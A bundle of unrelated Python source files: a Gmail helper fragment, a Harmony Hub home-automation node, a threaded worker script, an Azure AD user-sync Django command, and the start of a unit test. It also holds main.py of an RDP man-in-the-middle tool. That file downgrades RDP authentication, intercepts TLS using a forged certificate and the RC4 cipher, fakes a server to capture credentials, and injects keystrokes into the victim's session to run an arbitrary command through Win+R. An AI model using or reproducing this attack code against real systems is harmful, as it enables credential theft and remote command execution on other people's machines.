main_type, sub_type = content_type.split("/", 1)
with open(filepath, "rb") as file:
raw_data = file.read()
attm: MIMEBase
if main_type == "text":
attm = MIMEText(raw_data.decode("UTF-8"), _subtype=sub_type)
elif main_type == "image":
attm = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == "audio":
attm = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == "application":
attm = MIMEApplication(raw_data, _subtype=sub_type)
else:
attm = MIMEBase(main_type, sub_type)
attm.set_payload(raw_data)
fname = os.path.basename(filepath)
attm.add_header("Content-Disposition", "attachment", filename=fname)
msg.attach(attm)
def _get_alias_info(self, send_as_email: str, user_id: str = "me") -> dict:
"""
Returns the alias info of an email address on the authenticated
account.
Response data is of the following form:
{
"sendAsEmail": string,
"displayName": string,
"replyToAddress": string,
"signature": string,
"isPrimary": boolean,
"isDefault": boolean,
"treatAsAlias": boolean,
"smtpMsa": {
"host": string,
"port": integer,
"username": string,
"password": string,
"securityMode": string
},
"verificationStatus": string
}
Args:
            send_as_email: The alias address that account information is
                requested for (can be the primary address of the account).
            user_id: The user ID of the authenticated user that the alias
                belongs to (default "me").
Returns:
The dict of alias info associated with the account.
"""
req = (
self.service.users()
.settings()
.sendAs()
.get(sendAsEmail=send_as_email, userId=user_id)
)
res = req.execute()
return res
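# Usage sketch (assumes a valid client_secret.json / gmail_token.json in the
# working directory; the query value below is a placeholder):
if __name__ == "__main__":
    gmail = Gmail()
    # Reference attachments without downloading their data.
    for msg in gmail.get_unread_inbox(attachments="reference"):
        print(msg.subject)
    # Ordinary Gmail search syntax works through `query`.
    recent = gmail.get_messages(query="newer_than:2d")
    print("Messages in the last two days:", len(recent))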
|
Hub.py
|
from udi_interface import Node,LOGGER
import sys,logging,yaml,re
from traceback import format_exception
from threading import Thread,Event
from nodes import Device,Activity
from harmony_hub_funcs import ip2long,long2ip,get_valid_node_name,get_file
from pyharmony import client as harmony_client
from sleekxmpp.exceptions import IqError, IqTimeout
from copy import deepcopy
class Hub(Node):
def __init__(self, controller, address, name, host, port, watch=True, discover=False):
        # The id (node_def_id) is the address because each hub has a unique nodedef in the profile.
        # The id keeps the original case of the string.
self.id = address
self.name = name
self.host = host
self.port = port
self.controller = controller
self.discover = discover
self.watch = False # Not watching yet
self.watch_init = watch
self.client = None
self.current_activity = -2
self.thread = None
self.client_status = None
self.event = None
self.harmony_config = self.controller.harmony_config
self.st = 0
# Can't poll until start runs.
self.do_poll = False
self.lpfx = "%s:%s:" % (name,address)
controller.poly.subscribe(controller.poly.START, self.handler_start, address.lower())
LOGGER.info("hub '%s' '%s' %s" % (address, name, host))
        # But here we pass the lowercase, because ISY doesn't allow upper case!
        # A Hub is its own primary
super(Hub, self).__init__(controller.poly, address.lower(), address.lower(), name)
def handler_start(self):
LOGGER.info("hub '%s' '%s' %s" % (self.address, self.name, self.host))
self._set_st(0)
#
# Add host (IP) and port
#
self.setDriver('GV1', ip2long(self.host))
self.setDriver('GV2', self.port)
#
# Connect to the hub if desired
#
self.set_watch(self.watch_init)
#
# Call query to initialize and pull the info from the hub.
#
self.do_poll = True
LOGGER.info("done hub '%s' '%s' %s" % (self.address, self.name, self.host))
def set_watch(self,val):
if val:
if self.watch:
# Just make sure it's running
self.check_client()
else:
# Not watching, start it up
self.get_client()
self.watch = val
else:
# Just shut it down no matter what
self.stop()
# In case we restart
self.watch_init = val
def shortPoll(self):
# Query in poll mode, or if we haven't set the current_activity yet (which happens on startup)
#LOGGER.debug('watch={} client_status={}'.format(self.watch,self.client_status))
if self.watch:
if self.controller.activity_method == 1:
self._get_current_activity()
def longPoll(self):
#LOGGER.debug('watch={} client_status={}'.format(self.watch,self.client_status))
if self.watch:
self.check_client()
def query(self):
"""
Called by ISY to report all drivers for this node. This is done in
the parent class, so you don't need to override this method unless
there is a need.
"""
LOGGER.debug('watch={} client_status={}'.format(self.watch,self.client_status))
if self.watch:
if self.check_client():
self._get_current_activity()
self.reportDrivers()
def stop(self):
LOGGER.debug('...')
return self._close_client()
def restart(self):
# Called by controller to restart myself
self.stop()
self.start()
def _set_current_activity(self, id, force=False):
"""
Update Polyglot with the current activity.
"""
val = int(id)
if self.current_activity == val:
return True
# The harmony activity number
self.current_activity = val
index = self._get_activity_index(val)
LOGGER.info("activity=%d, index=%d" % (self.current_activity,index))
# Set to -1 to force a change.
self.setDriver('GV3', -1)
self.setDriver('GV3', index)
# Make the activity node current, unless it's -1 which is poweroff
        ignore_id = False
        if val != -1:
            sid = str(val)
            if sid in self.activity_nodes:
                self.activity_nodes[sid]._set_st(1)
                ignore_id = val
            else:
                LOGGER.error('activity {} not in nodes list.'.format(sid))
# Update all the other activities to not be the current.
self._set_all_activities(0,ignore_id=ignore_id)
return True
def get_client(self):
"""
Start the client in a thread so if it dies, we don't die.
"""
self.client_status = "init"
LOGGER.debug('Starting Thread')
self.event = Event()
self.thread = Thread(target=self._get_client)
self.thread.daemon = True
LOGGER.debug('Starting Thread')
st = self.thread.start()
LOGGER.debug('Back from Thread start st={}'.format(st))
def _get_client(self):
LOGGER.info("Initializing PyHarmony Client")
harmony_client.logger.setLevel(logging.INFO)
self.last_activity_method = self.controller.activity_method
try:
if self.controller.activity_method == 2:
self.client = harmony_client.create_and_connect_client(self.host, self.port, self._set_current_activity)
else:
self.client = harmony_client.create_and_connect_client(self.host, self.port)
if self.client is False:
LOGGER.error('harmony_client returned False, will retry connect during next shortPoll interval')
self._set_st(0)
self._close_client()
self.client_status = "failed"
return False
except:
            LOGGER.error('Failed to connect to host "{}" port "{}"'.format(self.host,self.port), exc_info=True)
self._set_st(0)
self._close_client()
self.client_status = "failed"
return False
LOGGER.info("PyHarmony client= " + str(self.client))
self._set_st(1)
# Setup activities and devices
self.init_activities_and_devices()
self._get_current_activity()
self.query()
self.client_status = True
# Hang around until asked to quit
LOGGER.debug('Wait until we are told to stop')
self.event.wait()
LOGGER.debug('Event is done waiting, Goodbye')
def check_client(self):
# Thread is none before we try to start it.
start_client = False
if self.thread is None:
LOGGER.info("Waiting for client thread to be created..")
return False
else:
if self.client is None:
                LOGGER.info("Client was stopped. client={0}".format(self.client))
self._set_st(1)
else:
# Then client_status will be True when client is ready
if self.client_status is True:
if self.thread.is_alive():
if self.client.state.current_state() == 'connected':
# All seems good.
# If activity method changed from or to a 2 then we need to reconnect to register or unregister the callback
if self.last_activity_method != self.controller.activity_method and (self.last_activity_method == 2 or self.controller.activity_method == 2):
LOGGER.info("Activity method changed from {0} to {1}, need to restart client".format(self.last_activity_method,self.controller.activity_method))
self._set_st(0)
else:
self._set_st(1)
return True
else:
LOGGER.error("Client no longer connected. client.state={0}".format(self.client.state.current_state()))
self._close_client()
else:
# Need to restart the thread
LOGGER.error("Thread is dead, need to restart")
self._set_st(0)
else:
if self.thread.is_alive():
LOGGER.info("Waiting for client startup to complete, status = {0}..".format(self.client_status))
return False
else:
LOGGER.error("Client startup thread dead?, Please send log package to developer. status = {0}..".format(self.client_status))
self._set_st(0)
# If we had a connection issue previously, try to fix it.
if self.st == 0:
LOGGER.debug("Calling get_client st=%d" % (self.st))
if not self.get_client():
return False
self._set_st(1)
return True
def _close_client(self):
self._set_st(0)
LOGGER.debug('client={}'.format(self.client))
if self.client is not None:
if self.client is False:
LOGGER.debug('we have no client={}'.format(self.client))
else:
try:
LOGGER.debug('disconnecting client={}'.format(self.client))
self.client.disconnect(send_close=True)
LOGGER.debug('disconnected client={}'.format(self.client))
except:
                    LOGGER.error('client.disconnect failed', exc_info=True)
return False
finally:
self.client = None
# Tells the thread to finish
LOGGER.debug('and finally client={} event={}'.format(self.client,self.event))
if self.event is not None:
LOGGER.debug('calling event.set')
self.event.set()
LOGGER.debug('returning')
return True
def _get_current_activity(self):
LOGGER.debug('...')
if self.check_client():
try:
ca = self.client.get_current_activity()
except IqTimeout:
                LOGGER.error('client.get_current_activity timeout')
self._close_client()
return False
except:
                LOGGER.error('client.get_current_activity failed', exc_info=True)
self._set_st(0)
return False
self._set_st(1)
if int(self.current_activity) != int(ca):
LOGGER.debug(" poll={0} current={1}".format(ca,self.current_activity))
self._set_current_activity(ca)
return True
else:
return False
def _set_st(self, value):
value = int(value)
if hasattr(self,'st') and self.st != value:
self.st = int(value)
LOGGER.info("setDriver(ST,{0})".format(self.st))
return self.setDriver('ST', self.st)
def delete(self):
"""
Delete all my children and then myself
"""
LOGGER.warning("%s: Deleting myself and all my children",self.lpfx)
# We use the list of nodes in the config, not just our added nodes...
for node in self.controller.poly.config['nodes'].copy():
address = node['address']
if node['primary'] == self.address and node['address'] != self.address:
LOGGER.warning('%s Deleting my child %s "%s"',self.lpfx,address,node['name'])
self.controller.poly.delNode(address)
LOGGER.warning('%s Deleting myself',self.lpfx)
self.controller.poly.delNode(self.address)
def config_good(self):
if self.harmony_config is None:
LOGGER.error('%s Config was not loaded: %s',self.lpfx,self.harmony_config)
return False
return True
def init_activities_and_devices(self):
LOGGER.info("start")
self.activity_nodes = dict()
self.device_nodes = dict()
if not self.config_good():
return False
#
# Add all activities except -1 (PowerOff)
#
for a in self.harmony_config['info']['activities']:
if not 'hub' in a:
LOGGER.error("Can not add activity with no hub, is your config file old? Please re-run Build Profile and restart. %s",a)
else:
try:
if a['id'] != '-1' and self.address in a['hub']:
LOGGER.info("Activity: %s Id: %s" % (a['label'], a['id']))
self.add_activity(str(a['id']),a['label'])
except:
LOGGER.error("%s Error adding activity",self.lpfx,exc_info=True)
#
# Add all devices
#
for d in self.harmony_config['info']['devices']:
if not 'hub' in d:
                LOGGER.error("Can not add device with no hub, is your config file old? Please re-run Build Profile and restart. %s",d)
else:
try:
if self.address in d['hub']:
LOGGER.info("Device :'%s' Id: '%s'" % (d['label'],d['id']))
self.add_device(str(d['id']),d['label'])
except:
LOGGER.error("%s Error adding device",self.lpfx,exc_info=True)
LOGGER.info("end")
def add_device(self,number,name):
# TODO: Pass in name and address as optional args.
node = self.controller.add_node(Device(self, number, get_valid_node_name(name)))
self.device_nodes[number] = node
        return node
def add_activity(self,number,name):
node = self.controller.add_node(Activity(self, number, get_valid_node_name(name)))
self.activity_nodes[number] = node
        return node
def start_activity(self, id=False, index=False):
"""
Start the activity
"""
if index is False and id is False:
LOGGER.error("Must pass id or index")
return False
if index is False:
index = self._get_activity_index(id)
elif id is False:
id = self._get_activity_id(index)
LOGGER.debug("id=%s index=%s" % (str(id),str(index)))
if self.client is None:
LOGGER.error("No Client" )
ret = False
else:
if id != -1:
ret = self.client.start_activity(id)
LOGGER.debug("id=%s result=%s" % (str(id),str(ret)))
else:
ret = self.client.power_off()
LOGGER.debug("power_off result=%s" % (str(ret)))
if ret:
# it worked, push it back to polyglot
self._set_current_activity(id)
return ret
def end_activity(self, id=False, index=False):
"""
End the activity
"""
if self.client is None:
LOGGER.error("No Client" )
ret = False
else:
# Only way to end, is power_off (activity = -1)
ret = self.client.power_off()
# TODO: Currently released version of pyharmony always returns None
# TODO: remove this if a new version is released.
ret = True
LOGGER.debug("ret=%s" % (str(ret)))
if ret:
self._set_current_activity(-1)
return ret
def _set_all_activities(self,val,ignore_id=False):
# All other activities are no longer current
for nid in self.activity_nodes:
if ignore_id is False:
self.activity_nodes[nid]._set_st(val)
else:
if int(nid) != int(ignore_id):
self.activity_nodes[nid]._set_st(val)
def _get_activity_id(self,index):
"""
        Convert from the activity index (as used by the NLS profile) to the real Harmony activity id
"""
LOGGER.debug(" %d" % (index))
if not self.config_good():
return False
return self.harmony_config['info']['activities'][index]['id']
def _get_activity_index(self,id):
"""
        Convert from the real Harmony activity id to the activity index (as used by the NLS profile)
"""
LOGGER.debug(str(id))
if not self.config_good():
return False
cnt = 0
for a in self.harmony_config['info']['activities']:
if int(a['id']) == int(id):
return cnt
cnt += 1
LOGGER.error("No activity id %s found." % (str(id)))
# Print them out for debug
for a in self.harmony_config['info']['activities']:
LOGGER.error(" From: label=%s, id=%s" % (a['label'],a['id']))
return False
def change_channel(self,channel):
LOGGER.debug("channel=%s" % (channel))
# Push it to the Hub
if self.client is None:
LOGGER.error("No Client for channel '%s'." % (channel))
ret = False
else:
try:
ret = self.client.change_channel(channel)
except (Exception) as err:
                LOGGER.error('failed {0}'.format(err), exc_info=True)
return False
LOGGER.debug("%s result=%s" % (channel,str(ret)))
# TODO: This always returns False :(
ret = True
return ret
def _cmd_set_current_activity(self, command):
"""
This runs when ISY changes the current current activity
"""
index = int(command.get('value'))
return self.start_activity(index=index)
def _cmd_change_channel(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
channel = int(command.get('value'))
LOGGER.debug("channel=%d" % (channel))
return self.change_channel(channel)
def _cmd_off(self, command):
"""
This runs when ISY calls Off or Fast Off and sets the activity to poweroff
"""
LOGGER.debug("activity=%d" % (self.current_activity))
return self.end_activity()
def _cmd_delete(self, command):
"""
        Deletes this Hub and all its children from Polyglot
"""
LOGGER.debug("")
return self.delete()
drivers = [
{'driver': 'ST', 'value': 0, 'uom': 2}, # bool: Connection status to Hub
{'driver': 'GV1', 'value': 0, 'uom': 56}, # integer: IP Address
{'driver': 'GV2', 'value': 0, 'uom': 56}, # integer: Port
{'driver': 'GV3', 'value': 0, 'uom': 25}, # integer: Current Activity
{'driver': 'GV4', 'value': 0, 'uom': 56}, #
{'driver': 'GV5', 'value': 0, 'uom': 56}, #
]
commands = {
'QUERY': query,
'SET_ACTIVITY': _cmd_set_current_activity,
'CHANGE_CHANNEL': _cmd_change_channel,
'DOF': _cmd_off,
'DFOF': _cmd_off,
'DEL': _cmd_delete,
}
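    # How these hook together (grounded in the code above): Polyglot dispatches
    # an incoming ISY command name ('QUERY', 'SET_ACTIVITY', 'CHANGE_CHANNEL',
    # 'DOF'/'DFOF', 'DEL') to the handler bound in this `commands` dict, while
    # `drivers` declares the node's status values (ST, GV1-GV5) that the
    # handlers update via setDriver().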
|
index.py
|
from scripts.query import run as query
from scripts.execute import run as execute
from utils.mongo import Mongo
from threading import Thread
query()
threads = 24
documents = Mongo().get_all_documents()
def loop(start, stop):
    # Process the half-open range [start, stop) of documents.
    for i in range(start, stop):
        if documents[i]['processed'] is False:
            execute(documents[i]['url'])
# Split the documents into `threads` contiguous chunks; the last chunk absorbs
# any remainder so no document is skipped.
size = len(documents) / threads
workers = []
for i in range(threads):
    start = int(size * i)
    stop = int(size * (i + 1)) if i != threads - 1 else len(documents)
    t = Thread(target=loop, args=(start, stop))
    t.start()
    workers.append(t)
for t in workers:
    t.join()
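# A shorter alternative (sketch only, not used above) would be a thread pool:
#
#   from concurrent.futures import ThreadPoolExecutor
#   with ThreadPoolExecutor(max_workers=threads) as pool:
#       pool.map(lambda d: execute(d['url']),
#                (d for d in documents if d['processed'] is False))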
|
check_azure_accounts.py
|
from datetime import datetime, timezone
from django.core.management.base import BaseCommand
import logging
from multiprocessing import Process, Queue
from organisation.models import DepartmentUser, CostCentre, Location
from organisation.utils import ms_graph_users
def get_users(queue):
# Worker function to call the Graph API via a process queue.
    queue.get()  # Drain the placeholder value put on the queue by the parent process.
    azure_users = ms_graph_users()
queue.put(azure_users)
return
class Command(BaseCommand):
help = 'Checks licensed user accounts from Azure AD and creates/updates linked DepartmentUser objects'
def handle(self, *args, **options):
logger = logging.getLogger('organisation')
logger.info('Querying Microsoft Graph API for Azure AD user accounts')
# Call the MS Graph API in a separate process with a timeout.
azure_users = None
queue = Queue()
queue.put(azure_users)
process = Process(target=get_users, args=(queue,))
process.start()
        process.join(timeout=80)  # Wait up to 80 seconds for the worker process to finish.
        if process.exitcode != 0:  # exitcode is None if the worker timed out and is still running.
            logger.error('Queued process did not complete in time')
            return
        azure_users = queue.get()
if not azure_users:
logger.error('Microsoft Graph API returned no data')
return
logger.info('Comparing Department Users to Azure AD user accounts')
for az in azure_users:
if az['mail'] and az['displayName']: # Azure object has an email address and a display name; proceed.
if not DepartmentUser.objects.filter(azure_guid=az['objectId']).exists():
# No existing DepartmentUser is linked to this Azure AD user.
# A department user with matching email may already exist in IT Assets with a different azure_guid.
# If so, return a warning and skip that user.
# We'll need to correct this issue manually.
if DepartmentUser.objects.filter(email=az['mail'], azure_guid__isnull=False).exists():
existing_user = DepartmentUser.objects.filter(email=az['mail']).first()
logger.warning(
'Skipped {}: email exists and already associated with Azure ObjectId {} (this ObjectId is {})'.format(az['mail'], existing_user.azure_guid, az['objectId'])
)
continue # Skip to the next Azure user.
# A department user with matching email may already exist in IT Assets with no azure_guid.
# If so, associate the Azure AD objectId with that user.
if DepartmentUser.objects.filter(email=az['mail'], azure_guid__isnull=True).exists():
existing_user = DepartmentUser.objects.filter(email=az['mail']).first()
existing_user.azure_guid = az['objectId']
existing_user.azure_ad_data = az
existing_user.azure_ad_data_updated = datetime.now(timezone.utc)
existing_user.update_from_azure_ad_data()
logger.info('AZURE AD SYNC: linked existing user {} with Azure objectId {}'.format(az['mail'], az['objectId']))
continue # Skip to the next Azure user.
# Only create a new DepartmentUser instance if the Azure AD account has >0 licences assigned to it.
if az['assignedLicenses']:
if az['companyName'] and CostCentre.objects.filter(code=az['companyName']).exists():
cost_centre = CostCentre.objects.get(code=az['companyName'])
else:
cost_centre = None
if az['officeLocation'] and Location.objects.filter(name=az['officeLocation']).exists():
location = Location.objects.get(name=az['officeLocation'])
else:
location = None
new_user = DepartmentUser.objects.create(
azure_guid=az['objectId'],
azure_ad_data=az,
azure_ad_data_updated=datetime.now(timezone.utc),
active=az['accountEnabled'],
email=az['mail'],
name=az['displayName'],
given_name=az['givenName'],
surname=az['surname'],
title=az['jobTitle'],
telephone=az['telephoneNumber'],
mobile_phone=az['mobilePhone'],
cost_centre=cost_centre,
location=location,
dir_sync_enabled=az['onPremisesSyncEnabled'],
)
logger.info(f'AZURE AD SYNC: created new department user {new_user}')
else:
# An existing DepartmentUser is linked to this Azure AD user.
# Update the existing DepartmentUser object fields with values from Azure.
existing_user = DepartmentUser.objects.get(azure_guid=az['objectId'])
existing_user.azure_ad_data = az
existing_user.azure_ad_data_updated = datetime.now(timezone.utc)
existing_user.update_from_azure_ad_data()
# Iterate through department users and clear any nonexistent Azure AD GUID values.
azure_users = {i['objectId']: i for i in azure_users}
for du in DepartmentUser.objects.filter(azure_guid__isnull=False, email__iendswith='@dbca.wa.gov.au'):
if du.azure_guid not in azure_users:
                logger.info("AZURE AD SYNC: Azure AD GUID {} not found in MS Graph output; clearing it from {}".format(du.azure_guid, du))
du.azure_guid = None
du.azure_ad_data = {}
du.azure_ad_data_updated = datetime.now(timezone.utc)
du.assigned_licences = []
du.dir_sync_enabled = None
du.save()
logger.info('Completed')
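# Invocation sketch: as a Django management command in the `organisation` app,
# this is normally run as `python manage.py check_azure_accounts` (assuming the
# file lives under organisation/management/commands/).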
|
main.py
|
import socket
import ssl
import threading
import select
import re
import os
import sys
import subprocess
import time
from binascii import hexlify, unhexlify
from base64 import b64encode
from seth.args import args
from seth.parsing import *
import seth.consts as consts
class RDPProxy(threading.Thread):
"""Represents the RDP Proxy"""
def __init__(self, local_conn, remote_socket):
super(RDPProxy, self).__init__()
self.cancelled = False
self.lsock = local_conn
self.rsock = remote_socket
self.vars = {}
self.injection_key_count = -100
self.keyinjection_started = False
if b"RC4-SHA" in subprocess.check_output('openssl ciphers'.split()):
self.rc4 = True
else:
print("Warning: RC4 not available on client, attack might not work")
self.rc4 = False
# self.relay_proxy = None
# if args.relay: # TODO
# threading.Thread(target=launch_rdp_client).start()
# relay_lsock, relay_rsock = open_sockets(consts.RELAY_PORT)
# self.relay_proxy = RDPProxyNTLMRelay(relay_lsock, relay_rsock)
# self.relay_proxy.start()
def run(self):
self.handle_protocol_negotiation()
if not (self.cancelled or self.vars["RDP_PROTOCOL"] == 0):
self.enableSSL()
if args.fake_server:
try:
self.run_fake_server()
except ConnectionResetError:
print("Connection lost on run_fake_server")
while not self.cancelled and not args.fake_server:
try:
self.forward_data()
except (ssl.SSLError, ssl.SSLEOFError) as e:
print("SSLError: %s" % str(e))
except (ConnectionResetError, OSError, ValueError) as e:
print("Connection lost (%s)" % str(e))
if "creds" in self.vars:
stop_attack()
def run_fake_server(self):
bufsize = 4096
# hide forged protocol
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
resp = consts.SERVER_RESPONSES[1]
regex = b".*%s..010c" % hexlify(b"McDn")
m = re.match(regex, hexlify(resp))
resp = set_fake_requested_protocol(resp, m,
self.vars["RDP_PROTOCOL"])
self.lsock.send(resp)
# start with channel join requests
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
self.lsock.send(consts.SERVER_RESPONSES[2])
# confirm all requests (reverse engineered; couldn't find
# documentation on this)
while True:
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
self.save_vars(parse_rdp(data, self.vars, From="Client"))
if "creds" in self.vars:
self.lsock.send(consts.SERVER_RESPONSES[3])
break
if data:
id = data[-1]
else:
id = 0
self.lsock.send(unhexlify(b"0300000f02f0803e00000803%02x03%02x" %
(id, id)))
self.close()
stop_attack()
def cancel(self):
self.close()
self.cancelled = True
def handle_protocol_negotiation(self):
data = self.lsock.recv(4096)
if not data:
print('No data returned')
self.cancelled = True
return None
dump_data(data, From="Client")
self.save_vars({"RDP_PROTOCOL_OLD": data[-4]})
data = downgrade_auth(data)
self.save_vars({"RDP_PROTOCOL": data[-4]})
if args.fake_server:
self.lsock.send(consts.SERVER_RESPONSES[0])
return None
try:
self.rsock.send(data)
except socket.error as e:
print("Error sending data: %s" % e)
os._exit(1)
try:
data = self.rsock.recv(4096)
except socket.error as e:
print("Error receiving data: %s" % e)
os._exit(1)
dump_data(data, From="Server")
regex = b"0300.*000300080005000000$"
m = re.match(regex, hexlify(data))
if m:
if not args.fake_server:
print("Server enforces NLA; switching to 'fake server' mode")
args.fake_server = True
data = consts.SERVER_RESPONSES[0]
try:
self.lsock.send(data)
except socket.error as e:
print("Error sending data: %s" % e)
os._exit(1)
def enableSSL(self):
print("Enable SSL")
try:
sslversion = get_ssl_version(self.lsock)
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.load_cert_chain(args.certfile, keyfile=args.keyfile, password=None)
self.lsock = ctx.wrap_socket(
self.lsock,
server_side=True,
do_handshake_on_connect=True,
)
if self.rc4:
try:
print("Try to use RC4-SHA cipher")
ctx.set_ciphers("RC4-SHA")
self.rsock = ctx.wrap_socket(
self.rsock,
do_handshake_on_connect=True,
)
except ssl.SSLError as e:
print("Not using RC4-SHA because of SSL Error:", str(e))
self.rsock = ctx.wrap_socket(
self.rsock,
do_handshake_on_connect=True,
)
except ConnectionResetError as e:
print("Unexpected error: %s" % e)
os._exit(1)
else:
self.rsock = ctx.wrap_socket(
self.rsock,
do_handshake_on_connect=True,
)
except ConnectionResetError as e:
print("Connection lost on enableSSL: %s" % e)
except ssl.SSLEOFError as e:
print("SSL EOF Error during handshake: %s" % e)
except AttributeError as e:
# happens when there is no rsock, i.e. fake_server==True
print(e)
pass
def close(self):
self.lsock.close()
if not args.fake_server:
self.rsock.close()
else:
pass
def forward_data(self):
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
for s_in in readable:
if s_in == self.lsock:
From = "Client"
s_out = self.rsock
elif s_in == self.rsock:
From = "Server"
s_out = self.lsock
try:
data = read_data(s_in)
except ssl.SSLError as e:
self.handle_ssl_error(e)
data = b""
if not data:
self.cancel()
return False
dump_data(data, From=From)
self.save_vars(parse_rdp(data, self.vars, From=From))
data = tamper_data(data, self.vars, From=From)
s_out.send(data)
if From == "Client" and "creds" in self.vars and args.inject:
self.send_keyinjection(s_out)
return True
def save_vars(self, vars):
for k, v in vars.items():
if k not in self.vars:
self.vars[k] = v
print_var(k, self.vars)
def handle_ssl_error(self, e):
if "alert access denied" in str(e):
print("TLS alert access denied, Downgrading CredSSP")
self.lsock.send(unhexlify(b"300da003020104a4060204c000005e"))
elif "alert internal error" in str(e):
# openssl connecting to windows7 with AES doesn't seem to
# work, thus try RC4 first
print("TLS alert internal error received, make sure to use RC4-SHA")
else:
raise
def send_keyinjection(self, s_out):
attack = convert_str_to_scancodes(args.inject)
if self.injection_key_count == 0:
print('Injecting command...')
for key in attack:
# use fastpath
data = unhexlify(b"4404%02x%02x" % (key[1], key[0]))
dump_data(data, From="Client", Modified=True)
s_out.send(data)
time.sleep(key[2])
print("Pwnd")
self.injection_key_count += 1
def read_data(sock):
data = sock.recv(4096)
if len(data) == 4096:
while len(data)%4096 == 0:
data += sock.recv(4096)
return data
def open_sockets(port):
try:
local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as e:
print("Error creating socket: %s" % e)
os._exit(1)
local_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
local_socket.bind((args.bind_ip, args.listen_port))
local_socket.listen()
print("Listening for new connection")
local_conn, addr = local_socket.accept()
print("Connection received from %s:%d" % addr)
remote_socket = None
if not args.fake_server:
try:
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as e:
print("Error creating socket: %s" % e)
os._exit(1)
try:
remote_socket.connect((args.target_host, port))
except socket.gaierror as e:
print("Address-related error connecting to server: %s" % e)
os._exit(1)
except socket.error as e:
print("Connection error: %s" % e)
os._exit(1)
return local_conn, remote_socket
def get_ssl_version(sock):
# Seth behaves differently depending on the TLS protocol
# https://bugs.python.org/issue31453
# This is an ugly hack (as if the rest of this wasn't...)
versions = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
]
firstbytes = sock.recv(16, socket.MSG_PEEK)
try:
return versions[firstbytes[10]-1]
except IndexError:
print("Unexpected SSL version: %s" % hexlify(firstbytes))
return versions[-1]
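# Illustrative sketch (added): byte 10 of a peeked TLS record is the minor version of
# the ClientHello's client_version field, which is what indexes the versions list above.
# With hypothetical first bytes of a TLS 1.2 ClientHello:
#
#     firstbytes = bytes.fromhex("16030100c1010000bd0303")
#     firstbytes[10]          # 3 -> client_version 3.3, i.e. TLS 1.2
#     # versions[3 - 1] == ssl.PROTOCOL_TLSv1_2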
# def launch_rdp_client():
# time.sleep(1)
# p = subprocess.Popen(
# ["xfreerdp",
# "/v:%s:%d" % (args.bind_ip, consts.RELAY_PORT),
# "/u:%s\\%s" % (domain, user),
# ],
# )
def stop_attack():
os._exit(0)
def convert_str_to_scancodes(string):
uppercase_letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# Actually, the following depends on the keyboard layout
special_chars = {
":": ".",
"{": "[",
"}": "]",
"!": "1",
"@": "2",
"#": "3",
"$": "4",
"%": "5",
"^": "6",
"&": "7",
"*": "8",
"(": "9",
")": "0",
"<": ",",
">": ".",
"\"": "'",
"|": "\\",
"?": "/",
"_": "-",
"+": "=",
}
UP = 1
DOWN = 0
MOD = 2
# For some reason, the meta (win) key needs an additional modifier (+2)
result = [[consts.REV_SCANCODE["LMeta"], DOWN + MOD, .2],
[consts.REV_SCANCODE["R"], DOWN, 0],
[consts.REV_SCANCODE["R"], UP, 0.2],
[consts.REV_SCANCODE["LMeta"], UP + MOD, .1],
]
for c in string:
if c in uppercase_letters:
result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result.append([consts.REV_SCANCODE["LShift"], UP, 0])
elif c in special_chars:
c = special_chars[c]
result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result.append([consts.REV_SCANCODE["LShift"], UP, 0])
else:
c = c.upper()
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result += [[consts.REV_SCANCODE["Enter"], DOWN, 0],
[consts.REV_SCANCODE["Enter"], UP, 0],
]
return result
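# Illustrative sketch (added): for a hypothetical payload the function emits a Win+R
# prefix, per-character make/break scancodes (wrapping LShift around uppercase and
# shifted characters), and a trailing Enter. Each entry is [scancode, up/down flag, delay]:
#
#     convert_str_to_scancodes("a")
#     # -> [LMeta down(+mod), R down, R up, LMeta up(+mod),
#     #     A down, A up,
#     #     Enter down, Enter up]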
def run():
try:
while True:
lsock, rsock = open_sockets(args.target_port)
RDPProxy(lsock, rsock).start()
except KeyboardInterrupt:
pass
|
tests.py
|
import unittest
import time
import random
import threading
from subprocess import CalledProcessError
from os.path import abspath, join, dirname, exists
from os import mkdir
import shutil
from maryjane import Project, Observer, MaryjaneSyntaxError
WAIT = 1
class ProjectTestCase(unittest.TestCase):
def setUp(self):
self.this_dir = abspath(dirname(__file__))
self.stuff_dir = join(self.this_dir, 'test_stuff')
self.static_dir = join(self.stuff_dir, 'static')
self.contrib_dir = join(self.stuff_dir, 'contrib')
self.temp_dir = join(self.stuff_dir, '../temp')
if exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
mkdir(self.temp_dir)
self.file1 = join(self.static_dir, 'file1.txt')
self.misc_file1 = join(self.static_dir, 'misc', 'file1.txt')
self.nowatch_file1 = join(self.static_dir, 'misc', 'no-watch-file.txt')
self.unused_file = join(self.contrib_dir, 'unused-file.txt')
self.dummy_file = join(self.contrib_dir, 'dummy-file.txt')
self.outfile = join(self.temp_dir, 'out.txt')
# Reset files
with open(self.file1, 'w') as f:
f.write('file1\n')
with open(self.misc_file1, 'w') as f:
f.write('misc file1\n')
with open(self.nowatch_file1, 'w') as f:
f.write('excluded file\n')
with open(self.dummy_file, 'w') as f:
f.write('Some dummy data\n')
with open(self.outfile, 'w') as f:
f.write('Some dummy texts\n')
def test_parser(self):
project = Project(join(self.stuff_dir, 'maryjane.yml'), watcher_type=None)
root = project.root
self.assertIsNotNone(root)
